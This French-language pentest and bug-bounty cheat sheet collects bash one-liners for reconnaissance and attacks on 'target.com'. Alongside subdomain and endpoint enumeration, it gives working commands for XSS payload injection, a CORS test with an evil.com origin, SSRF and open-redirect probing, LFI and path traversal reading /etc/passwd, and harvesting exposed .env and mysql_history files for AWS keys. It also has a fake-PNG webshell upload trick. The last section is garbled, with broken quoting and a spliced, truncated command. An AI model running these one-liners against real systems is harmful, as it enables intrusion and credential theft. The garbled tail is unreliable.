# One liners ## One liners ### Extraction d'URL depuis le code source ```bash curl "https://target.com/" | grep -oP '(https*://|www\.)[^]*' ``` ### Recherche de sous-domaines ```bash curl 'https://crt.sh/?q=%.target.com&output=json' | jq '.name_value' |sed 's/\"//g' | sed 's/\*\.//g' | sort -u ``` ### Recherche de endpoints ```bash #API Angular curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u ``` ### Filtrage de endpoints ```bash cat endpoints.txt | grep -i "admin\|login\|staging\|dashboard\|Admin\|\.asp\|\.php\|\.json\|cgi\|\.xml\|\.sql\|\.db\|\.rb\|\.py\|\.sh\|\.yml\|\.yaml\|\.ini\|\.md\|\.\js\|\.cfg\|env\|.\xls\|\.pdf\|\.docx" | anew interesting_path.txt ``` Utiliser les mots clés voulu dans la fonction grep. ### Screenshots d'un range d'IP ```bash IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$p.png); done; done ``` ### Générateur de wordlist adapté à la cible ```bash echo "target.com" | subfinder -silent | httpx | hakrawler | sed $'s/[./?=:&#]/\\\n/g' | anew wordlist.txt ``` ### XSS scanner ```bash echo "target.com" | waybackurls | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace '">' | freq gau target.com | uro | grep '?' | sed -e 's/:80//g' -e 's/:443//g' -e 's/http:/https:/g' -e 's/=/=Sirat%22%3E%3CH1%3Exss123/g' | httpx -silent -ms '

xss123' echo "target.com" | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)" cat targets.txt | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silent --skip-mining-dom --ignore-return 302,404,403 waybackurls target.com | grep "=" | uro | qsreplace '">' | freq | egrep -v 'Not' ``` ### CORS scanner ```bash assetfinder target.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n3[0;32m[VUL TO CORS] 3[0m{}"' 2>/dev/null ``` ### SSRF scanner ```bash #pip3 install queryswap echo "domain" | hakrawler -d 5 | grep "=" |python3 -m qs http%3a%2f%2fmy.burp.net ``` ### Open redirect ```bash export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I% -P 25 sh -c 'curl -ls "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' echo "https://target.com" | gau | grep =http | php -r "echo urldecode(file_get_contents('php://stdin'));" ``` ### LFI ```bash gau target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' ``` ### Nginx Path Traversal ```bash cat urls.txt | httpx -nc -t 250 -p 80,443,8080,8443,4443,8888,8081 -path "///////../../../etc/passwd" -mr "root:x" -silent | anew output.txt ``` ```bash httpx -l urls.txt -path "///////../../../../../etc/passwd -sc -mc 200 'root:' ``` ### Enregistrements CNAME ```bash cat live-domains.txt | while read domains;do dig $domains;done | grep CNAME | tee -a CNAME_Records ``` ### NXDOMAIN ``` subfinder -d target.com -silent | dnsx -a -resp | grep -i "NXDOMAIN" ``` ### Trouver des clés d'accès d'utilisateurs IAM (AWS) ```bash echo target.com | subfinder -silent | httpx -silent -path ".env","mysql_history","echo $(echo $(.' > shell.png echo -n '\x89\x50\x4E\x47.' > shell.png ```